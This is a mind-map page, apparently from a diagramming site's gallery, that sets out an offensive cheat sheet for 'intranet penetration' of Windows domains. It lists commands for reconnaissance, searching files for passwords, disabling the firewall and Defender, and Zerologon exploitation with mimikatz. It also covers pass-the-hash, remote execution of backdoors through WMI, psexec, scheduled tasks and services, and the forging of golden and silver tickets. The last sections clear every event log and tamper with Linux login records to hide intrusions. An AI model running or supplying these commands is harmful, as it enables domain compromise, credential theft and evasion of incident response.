Features
Features:

Product Tour >

Edraw AI >

Paid Plans:

Individuals >

Business >

Eduaction >
Resources
Blog

History

How-tos & Tips

Discovery

Biography

Business Analysis

Examples

AI concept Map

Free AI Mind Map Generator

Onenote Mind Map

Bcg Matrix Examples

Nike Marketing Strategy

Unilever SWOT Analysis

Make Mind Maps in Google Docs

Guide

FAQs

What's New

Resource Center
Templates
All Templates

Brain Storming Templates

Strategy and Planning Templates

Project Management Templates

Product Management Templates

Human Resources Templates

Agile Workflow Templates

Marketing Templates

Education Templates

Fun and Games Templates

User Gallery
Download
Pricing
Enterprise

MindMap Gallery Common commands for intranet penetration

Common commands for intranet penetration

Complete network security operation and maintenance emergency response, including information collection, file search, Remote, scheduled tasks, Port forwarding, backdoor, Tools, information acquisition, Trace cleaning, etc.

Edited at 2024-03-22 14:57:47

PlotWizard

Recent works View more works>>

Common commands for intranet penetration

PlotWizard

Recent works View more works>>

Recommended to you
Outline

Common commands for intranet penetration

collect message

net command

net time/domain net group "domain admins" /domain net group "domain controllers" /domain net user administrator /domain nltest /domain_trusts Get domain trust relationship nltest /dclist: net share net view \\domainip net view /domain View domain/workgroup list net view /domain:secwing View the list of computers in the secwing domain net config Workstation queries which domain the machine belongs to netstat -ano |findstr net accouts View local password policy

set View environment variables

nbtstat -A ip netbiso query whoami /all qwinsta //View login status query user //View the latest login time of the administrator nltest /domain_trusts //Get domain trust information taskkill /f /im tasklist /svc View processes tasklist /S ip /U domain\username /P /V //View the remote computer process list tracert IP //Route tracing route print //Print routing table arp -a //List all active IP addresses in this network segment arp -s (ip MAC) //Bind mac and ip address arp -d (ip MAC) //Unbind mac and ip addresses reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /ve Get recent mstsc login records setspn -Q \*/\* SPN list

File search

findstr finds files containing passwords

findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini

dir find file location

dir /b /s unattend.xml dir /b /s web.config dir /b /s sysprep.inf

Remotely

Turn off firewall

netsh firewall set opmode mode=disable netsh advfirewall set allprofiles state off

closewindefend

net stop windefend

Restore firewall to default

netsh firewall reset

Open port 3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

CVE-2020-1472

privilege::debug sekurlsa::logonpasswords lsadump::zerologon /target:ip /account:ADC1$ lsadump::zerologon /target:ip /account:ADC1$ /exploit lsadump::dcsync /domain:DC2.com /dc:DC2 /user:administrator /authuser:DC2$ /authdomain:DC2 /authpassword:"" /authntlm sekurlsa::pth /user:administrator /domain:. /rc5:161cff084477fe596a5db81874498a24

IPC

net use \\ip\ipc$ password /user:domain\user net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] password /user:username@domain copy putty.exe \\192.168.0.100\admin$ net time \\192.168.0.100 at \\192.168.0.100 19:45 putty.exe net use Z: \\192.168.0.100\c$ Map the target c drive to the local dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ net use * \\192.168.0.100 /del net use * /del /y net use * /del net use view session net session

WMI

wmic qfe get hotfixid //View installed patches, this is very practical wmic qfe list full /format:htable > hotfixes.htm //Detailed patch installation wmic qfe //Query patch information and download address provided by Microsoft ping hostname (host name) //Display the IP of the machine name wmic share get name,path //View the path pointed by SMB wmic nteventlog get path,filename,writeable //Query the storage location of system log files wmic service list brief //View process services wmic process list brief //View process wmic startup list brief //View startup program information wmic product list brief //View installation program and version information (vulnerability exploitation clues) wmic startup list full //Identify programs started at boot wmic process where(description="mysqld.exe") >> mysql.log //Get the software installation path wmic /node:ip /user: /p pwd process call create c:\backdoor.exe wmic /node /user: /password: process where e name="cmd.exe" cll terminate wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX process call create "cmd.exe /c ipconfig>c:\result.txt" WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig" wmic /node /user /password process where name="cmd.exe" get CommandLine

Scheduled Tasks

AT command (abandoned by win server2012)

Establish net use connection net use \\192.168.1.100\c$ 1qaz@WSX /user domain\user Copy bat file to remote computer copy exec.bat \\192.168.1.100\c$\windows\debug\exec.bat View remote computer time net time \\192.168.1.100 Create a new remote scheduled task at \\192.168.1.100 21.52 c:\windows\temp\exec.bat View the list of remote scheduled tasks at \\192.168.1.100

Schtasks

Create task schtasks /create /s ip /u administrator /password /ru "system" /tn adduser(name) /sc DAILY(time) /tr c:\windows\debug\add.bat /f Run tasks schtasks /run /s ip /u administrator /p password /tn adduser /i schtasks /run /tn update /$ 10.10.10.137 /u test \administrator /p 1qaz@WSX Delete task schtasks /delete /s ip /u administrator /p password /tn adduser /f

SC service control command, Microsoft built-in, cooperates with file sharing, and creates services remotely

Establish ipc connection and execute SC net use \\192.168.17.138\c$ "admin123" /user:pt007 net use dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ Create service sc \\remote_ip create services_name binpath= c:\backdoor.exe sc \\10.10.10.10 create update binpath= c:\programdata\a.bat Start service sc \\remote_ip start services_name sc \\10.10.10.10 start update Out of service sc \\remote_ip stop service_name sc \\10.10.10.10 stop update Delete service sc \\remote_ip delete service_name sc \\10.10.10.10 delete update

port forwarding

Netsh port forwarding

netsh firewall show config //View firewall policy netsh firewall show state //View firewall policy Enable port forwarding netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport open firewall netsh advfirewall firewall add rule name="firewallname" protocol=TCP dir=in localip=ip localport=port action=allow Show all forwarding rules netsh interface portproxy show all Delete forward netsh interface portproxy delete v4tov4 listenport=port listenaddress=ip reset netsh interface portproxy reset

SSH forwarding

1.ssh forward port forwarding ssh -L [<local host>:] <local port>:<remote host>:<remote port><ssh hostname> 2.ssh reverse port forwarding ssh -R [<local host>:]<local port>:<remote host>:<remote port><ssh hostname> 3.ssh socks proxy ssh -D [<local host>:] <local port><ssh hostname>

back door

golden note

Conditions and requirements for golden notes: 1.Domain name 2. SID value of domain whoami /user 3. Domain’s Krbtgt account NTLM password hash 4. Forged username sekurlsa::pth /user:administrator /domain:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd Login user domain address ntlm encryption value A CMD box will pop up here. Let’s check if we have permission first using dir \\OWA.GOD.org\c$ [View domain control C drive] dir \\\\DC.zkaq.cn\c$ lsadump::dcsync /user:krbtgt /domain: Get the password of krbtgt [mimikatz will simulate the domain control and request the account and password information from the target domain control] Extract the sid and hashNTLM inside Kerberos :: GOLDEN /Admin: administrator /domain:god.org /sign: S-1-5-21-2952760202-13539024381784089 /KRBTGT: 58e91a5886513AB2224312314000 61 /ticket:Administrator.kiribi [Production Bills] kerberos::ptt administrator.kiribi [load ticket] Direct injection of gold notes kerveros::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt kerberos::purge clears tickets privilege::debug Wait for the administrator to log in to get the password mimikatz #privilege::debug Privilege '20' OK mimikatz # misc::memssp Injected =) mimikatz #exit

silver notes

View current user sid whoami /user Get target computer hash sekurlsa::logonpasswords 1472 vulnerability Generate silver notes kerberos::golden /sid:domainsid /domain:test.local /ptt /id: fake user ID /target:mdc.test.local /service:cifs /rc: target computer hash /user: fake username

tool

dsquery

dsquery.exe user -limit 0#Query user object information dsquery.exe group -limit 0 #Query group object information dsquery.exe ou -limit 0#Query OU object information dsquery user domainroot -limit 65535 && net user /domain //List all user names in the domain dsquery server -domain supre.com | dsget server -dnsname -site //Search for all domain controllers in the domain and display their DNS host names and site names dsquery contact //Find contacts in the directory dsquery subnet //List the network segment divisions in this domain dsquery group && net group /domain //List the groups in this domain dsquery ou //List organizational units in this domain dsquery server && net time /domain //List domain controllers in this domain dsquery site -o rdn //Search for all site names in the domain dsquery group dc=GOD,dc=org |more Search all groups in the dc=god, dc=org domain dsquery.exe computer #Find the computer in the target dsquery.exe site #Find organizational units in the directory dsquery.exe server #Find the AD DC/LDS instance in the directory

ADfind

AdFind -sc dclist #List domain controller names AdFind -sc computers_active #Query the online computers in the current domain AdFind -sc computers_active name operatingSystem #Query the online computers in the current domain (only display name and operating system) AdFind.exe -sc computers_active name dnshostname #Query the active hosts in the domain and output the host name and domain name AdFind -f "objectcategory=computer" #Query all computers in the current domain AdFind -f "objectcategory=computer" name operatingSystem #Query all computers in the current domain (only the name and operating system are displayed) AdFind -users name #Query all users in the domain AdFind -sc gpodmp #Query all GPOs AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* #Query the detailed information of all users in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test #Query specific user details in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail #Query specific user-specific information (mail) in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn #Query the dn information of all users in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c #Query the number of users in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:* #Query the detailed information of all groups in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin #Query the detailed information of all groups in the domain whose group name contains Admin AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:* #Query all OU details in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:* #Query the detailed information of all computers in the domain AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:* #Query the detailed information of all sites in the domain

psexec paexec

psexec.exe -accepteula \\10.10.10.137 -u test\administrator -p 1qaz@WSX -i cmd.exe psexec.exe -accepteula -i -s -d cmd paexec.exe \\ip -u domain\user -p pwd cmd.exe -noname net use \\ip pwd /u:domain\user paexec.exe \\ip cmd.exe netsh winhttp sh proxy view proxy

winrm port multiplexing into the network

winrm quickconfig -q winrm s winrm/config/Client @{TrustedHosts="*"} Added port 80 monitoring winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} Modify 5985 to 80 winrm set winrm/config/Listener?Address=* Transprot=HTTP @{port=80} Modify WinRM port to web port winrs -r:http://xx -u:DC20\administratror -p:1qaz@WSX cmd

Access to information

powerview

load Imoport-Module .\PowerView.ps1 #Execute query Get-DomainGroup #Query group details Get-DomainOU #Query the detailed information of OU Get-DomainUser #Query user details

psloggendon.exe

psloggedon.exe username -l only displays local logged-in users and does not display other network logged-in users -x does not display login time Displays that the user currently logged in to the remote machine can type: psloggedon \\remote machine ip Add -accepteula for the first time to not display copyright information.

netsess.exe

netsess.exe \\PRIMARY

PVEFindADUser.exe

PVEFindADUser.exe -current

wevtutil

wevtutil epl Security C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 259200000 ]]]" /r:remote computer IP /u:username/p:password #epl export log #Security means security log #C:\log.evtx represents the location of the exported log. If exported remotely, it will be exported to the remote computer. #/q: represents the log query statement #System[(EventID=4624) represents the time ID of 4624, which is the log of successful user login #EventData[Data[@Name='LogonType']='3'] means the login type is network login #TimeCreated[timediff(@System Time) <= 259200000] means that only the logs of the last month will be exported. The unit of 259200000 is milliseconds. You can change the number size according to actual needs. #If you export locally, you do not need to specify the /r option. For more usage of #wevtutil, see its help documentation, which can be used to delete windows logs.

logparser

LogParser.exe -i:EVT -o csv "SELECT distinct TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) as SOURCE_IP FROM C:\*. evtx" > C:\log.csv # -i:EVT means the log input format is evtx # -o csv means the output format is csv # The content in double quotes is the query statement # distinct means deduplicating the results # TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME Parse the log name from the login log # USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) Parse the login source from the login log # *.evtx can process multiple log files at the same time # You can view the details of the login log through the following command LogParser.exe -i:EVT -o:DATAGRID "select * from *.evtx"

trace cleaning

wevtutil

wevtutil el lists the names of all logs in the system wevtutil cl system clears system logs wevtutil cl application cleans application logs wevtutil cl security clears security logs for /f "delims=" %j in('wevtutil.exe el') do @wevtutil.exe cl "%j" c:\windows\system32\winevt\logs\

windows defender

"C:\PROGRA~1\WINDOW~1\mpcmdrun.exe" -Restore -ListAll powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" powershell -Command Add-MpPreference -ExclusionExtension".java" powershell -Command Add-MpPreference -ExclusionProcess "*.exe" powershell -Command Get-MpPreference

ssh login information

/var/log/btmp records all login failure information, use the lastb command to view /var/log/lastlog records the last login time log of all users in the system. Use the lastlog command to view it. /var/log/wtmp records the login and logout information of all users, use the last command to view /var/log/utmp records the currently logged in user information, use w, who, users and other commands to view /var/log/secure records security-related log information /var/log/message records information and error logs after system startup The last login record displayed when logging into ssh last login time fromn ip Recorded in the file /var/log/lastlog ~/.ssh/known_hosts You can use sed to replace sed -i 's/own ip/original ip' /var/log/lastlog sed -i '/Today's date/'d filename Log in to the system invisibly and will not be detected by w, who, last and other commands ssh -T root@192.168.01 /bin/bash -i